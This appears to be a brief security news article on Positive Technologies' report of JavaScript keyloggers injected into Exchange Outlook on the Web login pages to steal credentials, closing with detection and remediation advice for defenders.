Unknown threat actors have compromised Microsoft Exchange Servers accessible from the internet, injecting keylogging code into the Outlook on the Web (OWA) login pages used by government agencies and private companies worldwide.

Researchers from Positive Technologies revealed that these JavaScript-based keyloggers are designed to silently capture user login credentials and, in some cases, cookies. The stolen data is either stored on the compromised server or exfiltrated to Telegram or Discord, with markers identifying the victim organization.

The method used to initially access the servers remains uncertain. While some of the affected servers were found to be vulnerable to older known exploits such as ProxyLogon and ProxyShell, others showed no signs of such weaknesses. This suggests attackers may have used undisclosed vulnerabilities or alternative entry points. The attackers’ focus appears widespread, with compromised servers located in countries across Asia, Europe, the Middle East, and Africa—targeting government bodies, as well as IT, industrial, and logistics sectors.

Although the keyloggers operate invisibly, their presence poses a serious risk to organizational security. Positive Technologies advises organizations to examine their Exchange login pages and authentication files for suspicious scripts, and inspect server directories for web shells or malicious pages. If a compromise is detected, immediate steps should include resetting user credentials, conducting a full investigation, and reviewing broader system access to mitigate further intrusion.